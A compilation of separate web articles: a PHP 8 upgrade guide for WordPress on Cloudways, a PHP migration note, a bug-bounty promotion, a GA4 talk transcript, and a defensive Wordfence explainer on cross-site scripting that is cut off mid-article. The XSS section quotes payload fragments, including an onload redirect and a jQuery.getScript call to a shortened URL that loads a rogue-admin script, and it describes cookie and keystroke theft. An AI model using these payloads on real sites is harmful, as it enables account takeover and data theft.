How to Update PHP in WordPress to PHP 8.0 on Cloudways

Cloudways announced its availability of PHP 8 earlier this year, maintaining its reputation of being the early bird to accept the latest updates. Want to update your PHP version on Cloudways? Follow the easy steps below to upgrade your current PHP version to PHP 8.0.

Note: Cloudways recommends keeping a backup of your server before upgrading to a newer PHP version. Keeping a backup will help you restore your application if you feel the need to revert to your previous PHP version anytime in the future.

Log in with Cloudways

  • Signup on Cloudways. Already have a Cloudways account? Log in with your credentials.
cloudways-login

Select Server

  • Click on Servers. Select, and click the server of your choice.
select server

Select Settings & Packages

  • Click on Settings & Packages on the left side.
Select Settings & Packages
  • Click on the Packages tab.
Select Packages

Upgrade your PHP version

  • Click the edit sign next to your current PHP version.
Upgrade your PHP version
  • Select PHP 8.0 from the drop-down, and click Save.
select PHP 8
  • The setup will prompt you with a warning to ensure if your application is compatible with the selected PHP version. If yes, then click OK.
click OK to select PHP version

The setup will take a few minutes to finish, and it will notify you once the update is done. After getting the notification, you can enjoy working with PHP 8.

PHP Supported Versions on WordPress

WordPress supports the following seven PHP versions ranging from PHP 5.6 to the latest version 8.0.

  • PHP 5.6
  • PHP 7.0
  • PHP 7.1
  • PHP 7.2
  • PHP 7.3
  • PHP 7.4
  • PHP 8.0
PHP supported versions

Note: Keep in mind that you won’t receive any PHP security updates if you are not using the latest PHP version. We recommend using the 8.0 PHP version.

What Is Holding Back Users From Updating to PHP 8.0?

The major reason that’s holding back users from upgrading to PHP 8 is the incompatibility of their favorite themes and plugins with PHP 8.

That said, every savvy user would like to enjoy the latest PHP features and RFC improvements. Anyone who wants to stay back and keep working with the legacy software would abstain from upgrading their PHP version.

Using the latest PHP versions allows for better and easier development of new features and also facilitates maintenance. Even if some of the themes and plugins are not working on PHP 8.0, they will eventually be updated.

Why Should You Upgrade to PHP 8?

Imagine using an outdated image editing tool for making logos or editing photos. While the world has moved to the latest version and is saving time and getting better quality and performance with the latest edition, you are still doing it the old way. Not really a smart decision, right?

Similarly, why would anyone abstain from upgrading to a newer PHP version when the new upgrade is specifically introduced to bring ease to the user’s end. You should definitely upgrade to PHP 8 if you want to benefit from the latest features, get better error handling, improved RFCs, and optimizations.

PHP 8 will remain in support till November 2022, and its security support will extend till November 2023. This longevity makes this newest version a lot more trustworthy and secure than the previous versions.

Most of the popular WordPress plugins and themes have accepted PHP 8 and are now compatible with it.

We ran a loader test to check PHP 8’s performance on the Cloudways server, and deduced the following results:

PHP 8 loader test

Source: Loader Test of PHP 8.0 on Cloudways Server

The average response time for the same WordPress website is 164 ms, and total success response counts are 3836.

Sadly, only 1.3% of the WordPress sites are using PHP 8.0. As per our experience, WordPress delivers the best performance with PHP 8.0 and gives better speeds than the previous PHP versions. It’s a good practice to use the latest versions, so the number of people migrating from 7.4 to 8.0 is gradually increasing with time.

PHP versions stats

Source: WordPress Version Stats

PHP has worked on the issues reported by the users in the previous versions, and the latest version is free from many recurring problems and has introduced new features.

To enjoy the services at their full potential, you will have to upgrade to the newest WordPress PHP version, as the older versions may eventually fade out or will be declined by most themes and plugins.

PHP Supported Versions

Source: PHP Supported Versions

Disadvantages of Using Older PHP Versions on WordPress

All PHP versions before 7.3 have reached their end of life, and it is advised to upgrade to the latest version if you are using any of the older versions, as it will make you vulnerable to unpatched security errors. Even 7.4 will reach the end of life on 28 Nov 2022.

Why would you risk your website to security vulnerabilities when you can easily upgrade to the latest version and enjoy the new improvements and features?

Also, ensure that you opt for a secure WordPress hosting provider to safeguard your sites from malicious traffic, DDoS attacks, and malware.

Using older PHP versions won’t only provide security issues but also will affect your website’s performance.

Which sane person compromises performance in this competitive era, where everyone is following the best practices to boost their site’s performance and gain their user’s attention?

Improve your website’s performance and security by halting the usage of older PHP versions, and upgrade your WordPress website’s PHP version to 8.0 to maximize safety and performance.

Final Thoughts

This blog covers PHP 8’s compatibility with WordPress and the steps to upgrade your PHP version to 8.0. The information shared in this guide will help you make the right decision to upgrade to PHP 8.0 on your WordPress site and enjoy the benefits of the newest update.

Ranging from the supported versions, disadvantages of using the old PHP version, and the reasons to upgrade to 8.0; we have tried to cover it all. Still, if any questions are popping up in your head, please feel free to comment with your queries; and we will answer all of them ASAP.

Frequently Asked Questions

Can WordPress use PHP 8?

Yes, WordPress can use PHP 8, and it is recommended to use PHP 8.0 with WordPress 5.6 or higher version for compatibility and better performance.
If you are using an older WordPress version, you can test your site with WordPress 5.6 in a staging environment. If you don’t experience any issues, then upgrade your live WordPress site to enjoy using PHP 8.0 on WordPress.

Is WordPress compatible with PHP 8?

Yes, WordPress is compatible with PHP 8.0. However, only WordPress 5.6 or higher versions are compatible with PHP 8. If you are using an older WordPress version, you can upgrade it to at least 5.6 to enjoy using PHP 8.

Should I upgrade to PHP 8?

Yes, if you want to benefit from the latest features, better error handling, improved RFCs, and optimizations, you should upgrade your PHP version to PHP 8.

What version of PHP should I use for WordPress?

We recommend using PHP 8.0 with WordPress if you are using at least WordPress 5.6. The oldest PHP version that we recommend using with WordPress is PHP 7.3.

Source :
https://www.cloudways.com/blog/wordpress-php-8/

Migrate WordPress from PHP 5 to PHP 7

If your website’s PHP version Because PHP is not the same as the PHP version in your backup, it may cause issues with the proper operation of your website and with some applications. This is more common when migrating from PHP 5 to PHP 7.

We recommend that users regularly backup their WordPress sites or network of sites. You can also use the All-in-One WP Migration plugin extensions to set up automatic backups. Make sure your plugin version is always up to date.
In most cases, the PHP update will have no effect on WordPress or popular plugins or themes. However, it is possible that some plugins, themes, or other functionalities will cease to function.

Set the WP_DEBUG constant to true in your wp-config.php file to see all errors, warnings, and notes generated by the website during execution. This will assist you in locating any problems.

If your install is stuck at “restoring X% files,” “restoring database,” or “activating mu-plugins”

1. Leave the plugin running for another 15 minutes while it is on “Restoring database.”
2. After 15 minutes, open another tab and attempt to login to wp-admin using the exported site’s WP Admin username and password.
3. Save the permalinks structure twice by going to settings -> permalinks.
Your website should now be successfully migrated.

If it isn’t and you receive a 500 error, please edit your wp-config.php file and set WP_DEBUG to true, then refresh the page to see an error. This may assist you in determining the problem, or you can share the error with the Servmask support team for assistance.

Could it be my server settings?

Memory limit needs to be at 256M, max_execution_time to 500, and mysql.connect_timeout to 400. You can find these settings by uploading this file. (https://www.dropbox.com/s/ize8t2k4nww5iq7/phpinfo.php?dl=0) in wp-content of your imported site and then open http://YOURDOMAINNAME.COM/wp-content/phpinfo.php. (tip – use Ctr F search the data that you get)

Source :
https://help.servmask.com/knowledgebase/migrate-wordpress-from-php-5-to-php-7/

Why Continuous Security Testing is a Must for Organizations Today

The global cybersecurity market is flourishing. Experts at Gartner predict that the end-user spending for the information security and risk management market will grow from $172.5 billion in 2022 to $267.3 billion in 2026.

One big area of spending includes the art of putting cybersecurity defenses under pressure, commonly known as security testing. MarketsandMarkets forecasts the global penetration testing (pentesting) market size is expected to grow at a Compound Annual Growth Rate (CAGR) of 13.7% from 2022 to 2027. However, the costs and limitations involved in carrying out a penetration test are already hindering the market growth, and consequently, many cybersecurity professionals are making moves to find an alternative solution.

Pentests aren’t solving cybersecurity pain points

Pentesting can serve specific and important purposes for businesses. For example, prospective customers may ask for the results of one as proof of compliance. However, for certain challenges, this type of security testing methodology isn’t always the best fit.

1 — Continuously changing environments

Securing constantly changing environments within rapidly evolving threat landscapes is particularly difficult. This challenge becomes even more complicated when aligning and managing the business risk of new projects or releases. Since penetration tests focus on one moment in time, the result won’t necessarily be the same the next time you make an update.

2 — Rapid growth

It would be unusual for fast-growing businesses not to experience growing pains. For CISOs, maintaining visibility of their organization’s expanding attack surface can be particularly painful.

According to HelpNetSecurity, 45% of respondents conduct pentests only once or twice per year and 27% do it once per quarter, which is woefully insufficient given how quickly infrastructure and applications change.

3 — Cybersecurity skills shortages

As well as limitations in budgets and resources, finding the available skillsets for internal cybersecurity teams is an ongoing battle. As a result, organizations don’t have the dexterity to spot and promptly remediate specific security vulnerabilities.

While pentests can offer an outsider perspective, often it is just one person performing the test. For some organizations, there is also an issue on trust when relying on the work of just one or two people. Sándor Incze, CISO at CM.com, gives his perspective:

“Not all pentesters are equal. It’s very hard to determine if the pentester you’re hiring is good.”

4 — Cyber threats are evolving

The constant struggle to stay up to date with the latest cyberattack techniques and trends puts media organizations at risk. Hiring specialist skills for every new cyber threat type would be unrealistic and unsustainable.

HelpNetSecurity reported that it takes 71 percent of pentesters one week to one month to conduct a pentest. Then, more than 26 percent of organizations must wait between one to two weeks to get the test results, and 13 percent wait even longer than that. Given the fast pace of threat evolution, this waiting period can leave companies unaware of potential security issues and open to exploitation.

5 — Poor-fitting security testing solutions for agile environments

Continuous development lifecycles don’t align with penetration testing cycles (often performed annually.) Therefore, vulnerabilities mistakenly created during long security testing gaps can remain undiscovered for some time.

Bringing security testing into the 21st-century Impact

Cybersecurity Testing

A proven solution to these challenges is to utilize ethical hacker communities in addition to a standard penetration test. Businesses can rely on the power of these crowds to assist them in their security testing on a continuous basis. A bug bounty program is one of the most common ways to work with ethical hacker communities.

What is a bug bounty program?

Bug bounty programs allow businesses to proactively work with independent security researchers to report bugs through incentivization. Often companies will launch and manage their program through a bug bounty platform, such as Intigriti.

Organizations with high-security maturity may leave their bug bounty program open for all ethical hackers in the platform’s community to contribute to (known as a public program.) However, most businesses begin by working with a smaller pool of security talent through a private program.

How bug bounty programs support continuous security testing structures

While you’ll receive a certificate to say you’re secure at the end of a penetration test, it won’t necessarily mean that’s still the case the next time you make an update. This is where bug bounty programs work well as a follow-up to pentests and enable a continuous security testing program.

The impact of bug bounty program on cybersecurity

By launching a bug bounty program, organizations experience:

  1. More robust protection: Company data, brand, and reputation have additional protection through continuous security testing.
  2. Enabled business goals: Enhanced security posture, leading to a more secure platform for innovation and growth.
  3. Improved productivity: Increased workflow with fewer disruptions to the availability of services. More strategic IT projects that executives have prioritized, with fewer security “fires” to put out.
  4. Increased skills availability: Internal security team’s time is freed by using a community for security testing and triage.
  5. Clearer budget justification: Ability to provide more significant insights into the organization’s security posture to justify and motivate for an adequate security budget.
  6. Improved relationships: Project delays significantly decrease without the reliance on traditional pentests.

Want to know more about setting up and launching a bug bounty program?

Intigriti is the leading European-based platform for bug bounty and ethical hacking. The platform enables organizations to reduce the risk of a cyberattack by allowing Intigriti’s network of security researchers to test their digital assets for vulnerabilities continuously.

If you’re intrigued by what you’ve read and want to know about bug bounty programs, simply schedule a meeting today with one of our experts.

www.intigriti.com

Source :
https://thehackernews.com/2022/09/why-continuous-security-testing-is-must.html

Top 4 Things to Know About GA4 — Whiteboard Friday

In this week’s Whiteboard Friday, Dana brings you some details on the exciting new world of Google Analytics 4. Watch and learn how to talk about it when clients and coworkers are intimidated by the move.https://fast.wistia.net/embed/iframe/bmdz65umai?videoFoam=true

whiteboard outlining four insights into GA4

Click on the whiteboard image above to open a high resolution version in a new tab!

Video Transcription

Hi, my name is Dana DiTomaso. I’m President at Kick Point. And I am here today at MozCon 2022 to bring you some details on the exciting world of Google Analytics 4, which I know all of you are like, “Ugh, I don’t want to learn about analytics,” which is totally fair. I also did not want to learn about analytics.

And then I kind of learned about it whether I liked it or not. And you should, too, unfortunately. 

So I think the biggest thing about the move from Universal Analytics to GA4 is that people are like they log in and everything looks different. “I don’t like it.” And then they leave. And I agree the user interface in GA4 leaves a lot to be desired. I don’t think there’s necessarily been a lot of good education, especially for those of us who aren’t analysts on a day-to-day basis.

We’re not all data scientists. I’m not a data scientist. I do marketing. So what I’m hoping is I can tell you the things you should know about GA4 on just a basic sort of level, so that you have a better vocabulary to talk about it when people are horrified by the move to GA4, which is inevitable. It’s going to happen. You’ve got to get it on your site starting basically immediately, if you don’t already have it. So I started out with three things, and then I realized there was a fourth thing. So you get a bonus, exciting bonus, but we’ll start with the first three things. 

1. It’s different

So the first thing it’s different, which I know is obvious. Yes, of course, Dana it’s different. But it’s different. Okay, so in Universal Analytics, there were different types of hits that could go into analytics, which is where hits came from originally as a metric that people talked about. So, for example, in Universal Analytics, you could have a pageview, or you could have a transaction, or you could have an event.

And those were all different types of hits. In GA4, everything is an event. There is a pageview event. There is a transaction event. There is, well, an event event. I mean, you name the events whatever you want. And because of that, it’s actually a lot better way to report on your data.

So, for example, one of the things that I know people always wanted to be able to report on in Universal Analytics is what pages did people see and how did that relate to conversion rate. And that was really tricky because a pageview was something that was at the hit scope level, which means it was just like the individual thing that happened, whereas conversion rate is a session scoped thing.

So you couldn’t mash together a hit scope thing with pageview with conversion rate, which is session scoped. They just didn’t combine together unless you did some fancy blending stuff in Data Studio. And who’s got time for that? So now in GA4, because everything is an event, you have a lot more freedom with how you can slice and dice and interpret your data and figure out what pages do people engage with before they actually converted, or what was that path, not just the landing page, but the entire user journey on their path to conversion. So that part is really exciting. 

2. Engagement rate is not reverse bounce rate

Second thing, engagement rate is a new metric in GA4. They do have bounce rate. They did recently announce it. I’m annoyed at it, so we’re going to talk about this a little bit. Engagement rate is not reverse bounce rate. But it is in GA4.

So in Universal Analytics, bounce rate was a metric that people reported on all the time, even though they shouldn’t have. I hate bounce rate so much. Just picture like a dumpster fire GIF right now across your screen. I hate bounce rate. And why I hate bounce rate is it’s so easily faked. Let’s say, for example, your boss says to you, “Hey, you know what, the bounce rate on our site is too high. Could you fix it?”

You’re like, “Oh, yeah, boss. Totally.” And then what you do is whenever somebody comes on your website, you send what’s called an interactive event off to Google Analytics at the same time. And now you have a 0% bounce rate. Congratulations. You got a raise because you made it up. Bounce rate could absolutely be faked, no question. And so when we moved over to GA4, originally there was no bounce rate.

There was engagement rate. Engagement rate has its own issues, but it’s not measuring anything similar to what bounce rate was. Bounce rate in UA was an event didn’t happen. It didn’t matter if you spent an hour and a half on the page reading it closely. If you didn’t engage in an event that was an interactive event, that meant that you were still counted as a bounce when you left that page.

Whereas in GA4, an engage session is by default someone spending 10 seconds with that tab, that website open, so active in their browser, or they visited two pages, or they had a conversion. Now this 10-second rule I think is pretty short. Ten seconds is not necessarily a lot of time for someone to be engaged with the website.

So you might want to change that. It’s under the tagging settings in your data stream. So if you go to Admin and then you click on your data stream and you go to more tagging settings and then you go to session timeouts, you can change it in there. And I would recommend playing around with that and seeing what feels right to you. Now GA4 literally just as I’m filming this has announced bounce rate, which actually it is reverse engagement rate. Please don’t use it.

Instead, think about engagement rate, which I think is a much more usable metric than bounce rate was in UA. And I’m kind of excited that bounce rate in UA is going away because it was [vocalization]. 

3. Your data will not match

All right. So next thing, your data is not going to match. And this is stressful because you’ve been reporting on UA data for years, and now all of a sudden it’s not going to match and people will be like, “But you said there were 101 users, and today you’re saying there were actually 102. What’s the problem?”

So, I mean, if you have that kind of dialogue with your leadership, you really need to have a conversation about the idea of accuracy in analytics, as in it isn’t, and error and everything else. But I mean, really the data is going to be different, and sometimes it’s a lot different. It’s not just a little bit different. And it’s because GA4 measures stuff differently than UA did. There is a page on Google Analytics Help, which goes into it in depth. But here are some of the highlights that I think you should really know sort of off the top of your head when you’re talking to people about this. 

Pageviews and unique pageviews

So first thing, a pageview metric, which we’re all familiar with, in Universal Analytics, this was all pageviews, including repeats. In GA4, same, pageview is pageview. Great.

So far so good. Then we had unique pageviews in Universal Analytics, which was only single views per session. So if I looked at the homepage and then I went to a services page and I went back to the homepage, I would have two pageviews of the homepage for pageview. I would have one pageview of the homepage in unique pageviews. That metric does not exist in GA4. So that is something to really watch for is that if you were used to reporting on unique pageviews, that is gone.

So I recommend now changing your reports to sort of like walk people through this comfort level of getting them used to the fact they’re not going to get unique pageviews anymore. Or you can implement something that I talk about in another one of my Whiteboard Fridays about being able to measure the percentage of people who are reloading tabs and tab hoarders. You could work that into this a little bit.

Users

Okay. Next thing is users. Users is really I think a difficult topic for a lot of people to get their heads around because they think, oh, user, that means that if I’m on my laptop and then I go to my mobile device, obviously I am one user. You’re usually not, unfortunately. You don’t necessarily get associated across multiple devices. Or if you’re using say a privacy- focused browser, like Safari, you may not even be associated in the same device, which kind of sucks.

The real only way you can truly measure if someone is a user across multiple sessions is if you have a login on your website, which not everybody does. A lot of B2B sites don’t have logins. A lot of small business sites don’t have logins. So users is already kind of a sketchy metric. And so unfortunately it’s one that people used to report on a lot in Universal Analytics.

So in Universal Analytics, users was total users, new versus returning. In GA4, it’s now active users. What is an active user? The documentation is a little unclear on how Google considers an active user. So I recommend reading that in depth. Just know that this is going to be different. You never should have been reporting on new versus returning users anyway, unless you had a login on your site because it was such a sketchy, bad metric, but I don’t think a lot of people knew how bad it was.

It’s okay. Just start changing your reports now so that when you have to start using GA4, on July 1, 2023, for real UA is done, then at least it’s not so much of a shock when you do make that transition. 

Sessions

So one other thing to think about as well with the changes is sessions. So in Universal Analytics, a session was the active use of a site, so you’re clicking on stuff.

It had a 30-minute timeout. And you may have heard never to use UTM tags on internal links on your website. And the reason why is because if someone clicked on an internal link on your website that had UTMs on it, your session would reset. And so you would have what’s called session breaking, where all of a sudden you would have a session that basically started in the middle of your website with a brand-new campaign and source and medium and completely detached from the session that they just had.

They would be a returning user though. That’s great. You shouldn’t have been reporting that anyway. Whereas in GA4 instead, now there’s an event because, remember, everything is an event now. There is an event that is called session start. And so that records when, well, the session starts. And then there’s also a 30-minute timeout, but there is no UTM reset.

Now that doesn’t mean that you should go out there and start using UTMs on internal links. I still don’t think it’s a great idea, but it’s not necessarily going to break things the way that it used to. So you can now see where did someone start on my site by looking at the session start event. I don’t know if it’s necessarily 100% reliable. We’ve seen situations where if you’re using consent management tools, for example, like a cookie compliance tool, you can have issues with sessions starting and whatnot.

So just keep that in mind is that it’s not necessarily totally foolproof, but it is a really interesting way to see where people started on the site in a way that you could not do this before. 

4. Use BigQuery

So bonus, bonus before we go. All right, the fourth thing that I think you should know about GA4, use BigQuery. There’s a built-in BigQuery export under the settings for GA4. Use it.

The reason why you should use it is: (a) the reports in GA4 are not great, the default reports, they kind of suck; (b) even the explorations are a bit questionable, like you can’t really format them to look nice at all. So what I’m saying to people is don’t really use the reports inside GA4 for any sort of useful reporting purposes. It’s more like an ad hoc reporting. But even then, I would still turn to BigQuery for most of my reporting needs.

And the reason why is because GA4 has some thresholding applied. So you don’t necessarily get all the data out of GA4 when you’re actually looking at reports in it. And this happened to me actually just this morning before I recorded this Whiteboard Friday. I was looking to see how many people engaged with the form on our website, and because it was a relatively low number, it said zero.

And then I looked at the data in BigQuery and it said 12. That amount could be missing from the reports in GA4, but you can see it in BigQuery, and that’s because of the thresholding that’s applied. So I always recommend using the BigQuery data instead of the GA4 data. And in Google Data Studio, if that’s what you use for your reporting tool, the same issue applies when you use GA4 as a data source.

You have the same thresholding problems. So really just use BigQuery. And you don’t need to know BigQuery. All you need to do is get the data going into BigQuery and then open up Google Data Studio and use that BigQuery table as your data source. That’s really all you need to know. No SQL required. If you want to learn it, that’s neat.

I don’t even know it that well yet. But it is not something you have to know in order to report well on GA4. So I hope that you found this helpful and you can have a little bit more of a better dialogue with your team and your leadership about GA4. I know it seems rushed. It’s rushed. Let’s all admit it’s rushed, but I think it’s going to be a really good move. I’m really excited about the new kinds of data and the amounts of data that we can capture now in GA4.

It really frees us from like the category action label stuff that we were super tied to in Universal Analytics. We can record so much more interesting data now on every event. So I’m excited about that. The actual transition itself might be kind of painful, but then a year from now, we’ll all look back and laugh, right? Thank you very much.

Video transcription by Speechpad.com

About Dana DiTomaso —

Dana is a partner at Kick Point, where she applies marketing into strategies to grow clients’ businesses, in particular to ensure that digital and traditional play well together. With her deep experience in digital, Dana can separate real solutions from wastes of time (and budget).

Source :
https://moz.com/blog/top-things-to-know-about-ga4-whiteboard-friday

Cross-Site Scripting: The Real WordPress Supervillain

Vulnerabilities are a fact of life for anyone managing a website, even when using a well-established content management system like WordPress. Not all vulnerabilities are equal, with some allowing access to sensitive data that would normally be hidden from public view, while others could allow a malicious actor to take full control of an affected website. There are many types of vulnerabilities, including broken access control, misconfiguration, data integrity failures, and injection, among others. One type of injection vulnerability that is often underestimated, but can provide a wide range of threats to a website, is Cross-Site Scripting, also known as “XSS”. In a single 30-day period, Wordfence blocked a total of 31,153,743 XSS exploit attempts, making this one of the most common attack types we see.

XSS exploit attempts blocked per day

What is Cross-Site Scripting?

Cross-Site Scripting is a type of vulnerability that allows a malicious actor to inject code, usually JavaScript, into otherwise legitimate websites. The web browser being used by the website user has no way to determine that the code is not a legitimate part of the website, so it displays content or performs actions directed by the malicious code. XSS is a relatively well-known type of vulnerability, partially because some of its uses are visible on an affected website, but there are also “invisible” uses that can be much more detrimental to website owners and their visitors.

Without breaking XSS down into its various uses, there are three primary categories of XSS that each have different aspects that could be valuable to a malicious actor. The types of XSS are split into stored, reflected, and DOM-based XSS. Stored XSS also includes a sub-type known as blind XSS.

Stored Cross-Site Scripting could be considered the most nefarious type of XSS. These vulnerabilities allow exploits to be stored on the affected server. This could be in a comment, review, forum, or other element that keeps the content stored in a database or file either long-term or permanently. Any time a victim visits a location the script is rendered, the stored exploit will be executed in their browser.

An example of an authenticated stored XSS vulnerability can be found in version 4.16.5 or older of the Leaky Paywall plugin. This vulnerability allowed code to be entered into the Thousand Separator and Decimal Separator fields and saved in the database. Any time this tab was loaded, the saved code would load. For this example, we used the JavaScript onmouseover function to run the injected code whenever the mouse went over the text box, but this could easily be modified to onload to run the code as soon as the page loads, or even onclick so it would run when a user clicks a specified page element. The vulnerability existed due to a lack of proper input validation and sanitization in the plugin’s class.php file. While we have chosen a less-severe example that requires administrator permissions to exploit, many other vulnerabilities of this type can be exploited by unauthenticated attackers.

Example of stored XSS

Blind Cross-Site Scripting is a sub-type of stored XSS that is not rendered in a public location. As it is still stored on the server, this category is not considered a separate type of XSS itself. In an attack utilizing blind XSS, the malicious actor will need to submit their exploit to a location that would be accessed by a back-end user, such as a site administrator. One example would be a feedback form that submits feedback to the administrator regarding site features. When the administrator logs in to the website’s admin panel, and accesses the feedback, the exploit will run in the administrator’s browser.

This type of exploit is relatively common in WordPress, with malicious actors taking advantage of aspects of the site that provide data in the administrator panel. One such vulnerability was exploitable in version 13.1.5 or earlier of the WP Statistics plugin, which is designed to provide information on website visitors. If the Cache Compatibility option was enabled, then an unauthenticated user could visit any page on the site and grab the _wpnonce from the source code, and use that nonce in a specially crafted URL to inject JavaScript or other code that would run when statistics pages are accessed by an administrator. This vulnerability was the result of improper escaping and sanitization on the ‘platform’ parameter.

Example of blind XSS

Reflected Cross-Site Scripting is a more interactive form of XSS. This type of XSS executes immediately and requires tricking the victim into submitting the malicious payload themselves, often by clicking on a crafted link or visiting an attacker-controlled form. The exploits for reflected XSS vulnerabilities often use arguments added to a URL, search results, and error messages to return data back in the browser, or send data to a malicious actor. Essentially, the threat actor crafts a URL or form field entry to inject their malicious code, and the website will incorporate that code in the submission process for the vulnerable function. Attacks utilizing reflected XSS may require an email or message containing a specially crafted link to be opened by an administrator or other site user in order to obtain the desired result from the exploit. This XSS type generally involves some degree of social engineering in order to be successful and it’s worth noting that the payload is never stored on the server so the chance of success relies on the initial interaction with the user.

In January of 2022, the Wordfence team discovered a reflected XSS vulnerability in the Profile Builder – User Profile & User Registration Forms plugin. The vulnerability allowed for simple page modification, simply by specifically crafting a URL for the site. Here we generated an alert using the site_url parameter and updated the page text to read “404 Page Not Found” as this is a common error message that will not likely cause alarm but could entice a victim to click on the redirect link that will trigger the pop-up.

Example of reflected XSS

DOM-Based Cross-Site Scripting is similar to reflected XSS, with the defining difference being that the modifications are made entirely in the DOM environment. Essentially, an attack using DOM-based XSS does not require any action to be taken on the server, only in the victim’s browser. While the HTTP response from the server remains unchanged, a DOM-based XSS vulnerability can still allow a malicious actor to redirect a visitor to a site under their control, or even collect sensitive data.

One example of a DOM-based vulnerability can be found in versions older than 3.4.4 of the Elementor page builder plugin. This vulnerability allowed unauthenticated users to be able to inject JavaScript code into pages that had been edited using either the free or Pro versions of Elementor. The vulnerability was in the lightbox settings, with the payload formatted as JSON and encoded in base64.

Example of DOM-based XSS

How Does Cross-Site Scripting Impact WordPress Sites?

WordPress websites can have a number of repercussions from Cross-Site Scripting (XSS) vulnerabilities. Because WordPress websites are dynamically generated on page load, content is updated and stored within a database. This can make it easier for a malicious actor to exploit a stored or blind XSS vulnerability on the website which means an attacker often does not need to rely on social engineering a victim in order for their XSS payload to execute.

Using Cross-Site Scripting to Manipulate Websites

One of the most well-known ways that XSS affects WordPress websites is by manipulating the page content. This can be used to generate popups, inject spam, or even redirect a visitor to another website entirely. This use of XSS provides malicious actors with the ability to make visitors lose faith in a website, view ads or other content that would otherwise not be seen on the website, or even convince a visitor that they are interacting with the intended website despite being redirected to a look-alike domain or similar website that is under the control of of the malicious actor.

When testing for XSS vulnerabilities, security researchers often use a simple method such as alert() prompt() or print() in order to test if the browser will execute the method and display the information contained in the payload. This typically looks like the following and generally causes little to no harm to the impacted website:

Example of XSS popup

This method can also be used to prompt a visitor to provide sensitive information, or interact with the page in ways that would normally not be intended and could lead to damage to the website or stolen information.

One common type of XSS payload we see when our team performs site cleanings is a redirect. As previously mentioned, XSS vulnerabilities can utilize JavaScript to get the browser to perform actions. In this case an attacker can utilize the window.location.replace() method or other similar method in order to redirect the victim to another site. This can be used by an attacker to redirect a site visitor to a separate malicious domain that could be used to further infect the victim or steal sensitive information.

In this example, we used onload=location.replace("https://wordfence.com") to redirect the site to wordfence.com. The use of onload means that the script runs as soon as the element of the page that the script is attached to loads. Generating a specially crafted URL in this manner is a common method used by threat actors to get users and administrators to land on pages under the actor’s control. To further hide the attack from a potential victim, the use of URL encoding can modify the appearance of the URL to make it more difficult to spot the malicious code. This can even be taken one step further in some cases by slightly modifying the JavaScript and using character encoding prior to URL encoding. Character encoding helps bypass certain character restrictions that may prevent an attack from being successful without first encoding the payload.

Example of XSS redirect

When discussing manipulation of websites, it is hard to ignore site defacements. This is the most obvious form of attack on a website, as it is often used to replace the intended content of the website with a message from the bad actor. This is often accomplished by using JavaScript to force the bad actor’s intended content to load in place of the original site content. Utilizing JavaScript functions like document.getElementByID() or window.location() it is possible to replace page elements, or even the entire page, with new content. Defacements require a stored XSS vulnerability, as the malicious actor would want to ensure that all site visitors see the defacement.

Example of XSS defacement

This is, of course, not the only way to deface a website. A defacement could be as simple as modifying elements of the page, such as changing the background color or adding text to the page. These are accomplished in much the same way, by using JavaScript to replace page elements.

Stealing Data With Cross-Site Scripting

XSS is one of the easier vulnerabilities a malicious actor can exploit in order to steal data from a website. Specially crafted URLs can be sent to administrators or other site users to add elements to the page that send form data to the malicious actor as well as, or instead of, the intended location of the data being submitted on the website under normal conditions.

The cookies generated by a website can contain sensitive data or even allow an attacker to access an authenticated user’s account directly. One of the simplest methods of viewing the active cookies on a website is to use the document.cookie JavaScript function to list all cookies. In this example, we sent the cookies to an alert box, but they can just as easily be sent to a server under the attacker’s control, without even being noticeable to the site visitor.

Example of stealing cookies with XSS

While form data theft is less common, it can have a significant impact on site owners and visitors. The most common way this would be used by a malicious actor is to steal credit card information. It is possible to simply send input from a form directly to a server under the bad actor’s control, however it is much more common to use a keylogger. Many payment processing solutions embed forms from their own sites, which typically cannot be directly accessed by JavaScript running in the context of an infected site. The use of a keylogger helps ensure that usable data will be received, which may not always be the case when simply collecting form data as it is submitted to the intended location.

Here we used character encoding to obfuscate the JavaScript keystroke collector, as well as to make it easy to run directly from a maliciously crafted link. This then sends collected keystrokes to a server under the threat actor’s control, where a PHP script is used to write the collected keystrokes to a log file. This technique could be used as we did here to target specific victims, or a stored XSS vulnerability could be taken advantage of in order to collect keystrokes from any site visitor who visits a page that loads the malicious JavaScript code. In either use-case, a XSS vulnerability must exist on the target website.

Example of XSS form theft

If this form of data theft is used on a vulnerable login page, a threat actor could easily gain access to usernames and passwords that could be used in later attacks. These attacks could be against the same website, or used in credential stuffing attacks against a variety of websites such as email services and financial institutions.

Taking Advantage of Cross-Site Scripting to Take Over Accounts

Perhaps one of the most dangerous types of attacks that are possible through XSS vulnerabilities is an account takeover. This can be accomplished through a variety of methods, including the use of stolen cookies, similar to the example above. In addition to simply using cookies to access an administrator account, malicious actors will often create fake administrator accounts under their control, and may even inject backdoors into the website. Backdoors then give the malicious actor the ability to perform further actions at a later time.

If a XSS vulnerability exists on a site, injecting a malicious administrator user can be light work for a threat actor if they can get an administrator of a vulnerable website to click a link that includes an encoded payload, or if another stored XSS vulnerability can be exploited. In this example we injected the admin user by pulling the malicious code from a web-accessible location, using a common URL shortener to further hide the true location of the malicious location. That link can then be utilized in a specially crafted URL, or injected into a vulnerable form with something like onload=jQuery.getScript('https://bit.ly/<short_code>'); to load the script that injects a malicious admin user when the page loads.

Example of adding a malicious admin user with XSS

Backdoors are a way for a malicious actor to retain access to a website or system beyond the initial attack. This makes backdoors very useful for any threat actor that intends to continue modifying their attack, collect data over time, or regain access if an injected malicious admin user is removed by a site administrator. While JavaScript running in an administrator’s session can be used to add PHP backdoors to a website by editing plugin or theme files, it is also possible to “backdoor” a visitor’s browser, allowing an attacker to run arbitrary commands as the victim in real time. In this example, we used a JavaScript backdoor that could be connected to from a Python shell running on a system under the threat actor’s control. This allows the threat actor to run commands directly in the victim’s browser, allowing the attacker to directly take control of it, and potentially opening up further attacks to the victim’s computer depending on whether the browser itself has any unpatched vulnerabilities.

Often, a backdoor is used to retain access to a website or server, but what is unique about this example is the use of a XSS vulnerability in a website in order to gain access to the computer being used to access the affected website. If a threat actor can get the JavaScript payload to load any time a visitor accesses a page, such as through a stored XSS vulnerability, then any visitor to that page on the website becomes a potential victim.

Example of a XSS backdoor

Tools Make Light Work of Exploits

